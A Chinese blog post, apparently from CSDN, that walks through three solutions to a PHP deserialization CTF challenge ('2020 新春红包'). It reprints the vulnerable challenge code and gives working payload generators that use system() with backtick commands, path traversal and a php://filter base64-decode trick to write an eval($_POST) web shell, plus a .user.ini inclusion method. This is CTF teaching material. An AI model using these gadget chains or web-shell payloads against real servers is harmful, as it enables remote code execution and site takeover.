[2020 新春红包题]1&ezpop改编题3种解法

最新推荐文章于 2023-02-06 17:27:32 发布
最新推荐文章于 2023-02-06 17:27:32 发布
阅读量257 收藏
点赞数
分类专栏: ctf web
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/jvkyvly/article/details/119788676
版权
ctf 同时被 2 个专栏收录
31 篇文章 1 订阅
订阅专栏
web
26 篇文章 0 订阅
订阅专栏 
<?php
error_reporting(0);

class A {

    protected $store;

    protected $key;

    protected $expire;

    public function __construct($store, $key = 'flysystem', $expire = null) {
        $this->key = $key;
        $this->store = $store;
        $this->expire = $expire;
    }

    public function cleanContents(array $contents) {
        $cachedProperties = array_flip([
            'path', 'dirname', 'basename', 'extension', 'filename',
            'size', 'mimetype', 'visibility', 'timestamp', 'type',
        ]);

        foreach ($contents as $path => $object) {
            if (is_array($object)) {
                $contents[$path] = array_intersect_key($object, $cachedProperties);
            }
        }

        return $contents;
    }

    public function getForStorage() {
        $cleaned = $this->cleanContents($this->cache);

        return json_encode([$cleaned, $this->complete]);
    }

    public function save() {
        $contents = $this->getForStorage();

        $this->store->set($this->key, $contents, $this->expire);
    }

    public function __destruct() {
        if (!$this->autosave) {
            $this->save();
        }
    }
}

class B {

    protected function getExpireTime($expire): int {
        return (int) $expire;
    }

    public function getCacheKey(string $name): string {
        // 使缓存文件名随机
        $cache_filename = $this->options['prefix'] . uniqid() . $name;
        if(substr($cache_filename, -strlen('.php')) === '.php') {
          die('?');
        }
        return $cache_filename;
    }

    protected function serialize($data): string {
        if (is_numeric($data)) {
            return (string) $data;
        }

        $serialize = $this->options['serialize'];

        return $serialize($data);
    }

    public function set($name, $value, $expire = null): bool{
        $this->writeTimes++;

        if (is_null($expire)) {
            $expire = $this->options['expire'];
        }

        $expire = $this->getExpireTime($expire);
        $filename = $this->getCacheKey($name);

        $dir = dirname($filename);

        if (!is_dir($dir)) {
            try {
                mkdir($dir, 0755, true);
            } catch (\Exception $e) {
                // 创建失败
            }
        }

        $data = $this->serialize($value);

        if ($this->options['data_compress'] && function_exists('gzcompress')) {
            //数据压缩
            $data = gzcompress($data, 3);
        }

        $data = "<?php\n//" . sprintf('%012d', $expire) . "\n exit();?>\n" . $data;
        $result = file_put_contents($filename, $data);

        if ($result) {
            return $filename;
        }

        return null;
    }

}

if (isset($_GET['src']))
{
    highlight_file(__FILE__);
}

$dir = "uploads/";

if (!is_dir($dir))
{
    mkdir($dir);
}
unserialize($_GET["data"]);

1、预期解

return json_encode([$cleaned, $this->complete]);

$data = $this->serialize($value);

被 json 编码了,但我们仍然可以在其中插入一段完整的内容,所以插入一段用反引号`括起来的命令,由于整段东西传入 system 函数之后是调用 shell 来执行,执行顺序有先后,反引号内的会被先执行,即可达到我们执行命令的目的。

payload

<?php

class A {

    protected $store;
	public function __construct(){
		$this->store=new B();
		$this->key = 'aaa';
		$this->cache=["`ls >3.php`"];
		$this->complete="`echo PD9waHAgZXZhbCgkX1BPU1RbMF0pOz8+|base64 -d >4.php`";
	}
}

class B {
	public function __construct(){
		$this->options['serialize']="system";
	}
	
	
}

$a=new A();
echo urlencode(serialize($a));

细节:cache必须要传个数组

public function cleanContents(array $contents) {

要求的值是数组,不然执行中断…

key 也要传值,为了让new B的set方法参数不为空,不然会报错中断…

2. .php后缀的绕过

uniqid()随机数可以用/…/目录穿越绕过 ,后面可以用/.绕过(啥原因还不清楚)

在这里插入图片描述
然后就和ezpop那个题做法差不多了

<?php

class A {

    protected $store;
	public function __construct(){
		$this->store=new B();
		$this->key = '/../shell.php/.';
		$this->cache=[];
		$this->complete=base64_encode("xxxPD9waHAgZXZhbCgkX1BPU1RbMV0pOz8+");
	}
}

class B {
	public function __construct(){
		$this->options['prefix']="php://filter/write=convert.base64-decode/resource=";
		$this->options['serialize']="base64_decode";
	}
	
	
}

$a=new A();
echo urlencode(serialize($a));

shell密码设置的是1

3.用.user.ini 包含来做

先传一个.user.ini中设置好要包含的文件名,
再上传上面的文件名不是.php后缀就好,然后内容搞一句话木马就好…

Je3Z
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
2020新春快乐flash动画
07-24
2020新春快乐”的Flash动画,很可能是为农历新年设计的一电子贺卡,通过动画的形式传递新年的祝福。 描述中提到的“新年过年庆祝动画贺卡素材下载”,进一步证实了这是一个用于新年庆祝的数字资源。用户...
2020新春背景矢量素材
07-25
本文将深入探讨“2020新春背景矢量素材”这一主,涵盖其特点、用途、相关技术以及如何在设计项目中应用。 首先,矢量素材是指基于数学公式和路径描述的图像,它由点、线和曲线构成,能够无限放大而不会失真。...
[2020 新春红包]1
LYJ20010728的博客
05-26 455
[2020 新春红包]1考点思路Payload 考点 php反序列化、ThinkPHP6.0POC链、目录穿越 思路 根据hint的内容传参?src=1得到源码 解法一:直接写命令,生成flag文件 解法二:对于前面的随机值,使用/…/即可截断,时间戳将会被认为一个目录,后面即可追加写任意文件 解法三:先可以利用跨目录,这样就可以不去爆破文件名,再利用.user.ini绕过后缀名限制 Payload 传参得到的源码 <?php error_reporting(0); class A {
buuctf [2020 新春红包]1
SopRomeo的博客
05-18 1219
<?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store = $store;
BUUCTF WEB 2020新春红包1
qq_41696858的博客
05-31 324
还是太菜了,继续更吧。发现自己反序列化这块挺菜的,找个目来看看吧,明显的看到了serialize,还有file_put_contents,看来是序列化写shell无疑了 <?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $
BUUCTF:[2020 新春红包]
末初的CSDN博客
03-27 2239
<?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this...
2020新春祝福flash动画
07-24
2020新春祝福flash动画”指的是一个用于庆祝2020年中国新年的交互式动画作品,它可能是由Adobe Flash软件创作的。Flash是一流行的技术,曾广泛用于制作网页上的动态内容,如广告、游戏和多媒体交互设计。...
2020年鼠年新春矢量图
07-25
2020年鼠年新春矢量图】是一组专为庆祝2020年中国农历新年设计的矢量图形素材。在这个集合中,设计师利用AI(Adobe Illustrator)这一专业图形设计软件,创作了一系列与鼠年和春节主相关的高分辨率、可编辑的...
buuoj [2020 新春红包]3 2.29下unsortedbin attack的替代方法——Tcache Stashing
weixin_46521144的博客
08-09 701
IDA分析 seccomp只允许orw 程序没有开启canary,末尾有一个大小为0x10的溢出,可以构造栈迁移,栈迁移可以直接orw, 但是需要条件。 需要满足这里的backdoor chunk中的部分内容值大小要求。这里的backdoor chunk是程序一开始申请的chunk,我们不能正常写入,看到这里其实可以想到unsortedbin attack。但是程序是glibc2.29,没有unsorted bin attack 允许构造的chunk只能是0x10,0xf0,0x300,0x400 这道
[2020 新春红包]3(libc2.29 tcache tashing unlink )
m0_51251108的博客
09-29 1030
libc2.29 tcache tashing unlink
吾爱破解新春红包之Web系列解过程(writeup)
最新发布
Tokeii想躺平
02-06 851
吾爱破解新年Web系列解
buuoj Pwn writeup 131-135
yongbaoii的博客
05-16 536
131 starctf_2019_babyshell 保护 132 SWPUCTF_2019_p1KkHeap 保护 133 ciscn_2019_s_6 保护 134 [2020 新春红包]3 保护 135 hitcon_2018_children_tcache 保护
NSSCTF-prize5
Monica的博客
11-04 765
目 <?php error_reporting(0); class catalogue{ public $class; public $data; public function __construct() { $this->class = "error"; $this->data = "hacker"; } public function __destruct() { echo
BUUCTF__[EIS 2019]EzPOP_
风过江南乱的博客
04-28 987
BUUCTF__[EIS 2019]EzPOP_解 php反序列化
[EIS 2019]EzPOP
fmyyy1的博客
04-28 244
<?php error_reporting(0); class A { protected $store; protected $key; protected $expire; public function __construct($store, $key = 'flysystem', $expire = null) { $this->key = $key; $this->store = $store;
CTF新生杯PHP反序列化——ezpop
白给、少年
02-26 937
目源码: <?php error_reporting(0); class openfunc{ public $object; function __construct(){ $this->object=new normal(); } function __wakeup(){ $this->object=new normal(); } function __destruct(){ $this
CTF web总结--上传文件绕过
bob的博客
08-30 9633
代码:<?php if (empty($_FILES['inputFile'])) { echo json_encode(['error'=>'No files found for upload.']); return; }$allowedExts = array('php', 'php3', 'php4', 'php5', 'php7', 'phtml', 'cgi'); $su
2013年R&Hadoop学习群新春特刊:知识与技术精华
"2013年大数据的真谛:实时分析和批量处理"探讨了在大数据时代,实时分析与批处理的不同应用场景和策略,帮助读者理解在数据处理中灵活运用这两方法的重要性。"R者知天下"则聚焦于R语言本身,包括介绍"神奇的脸谱图...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值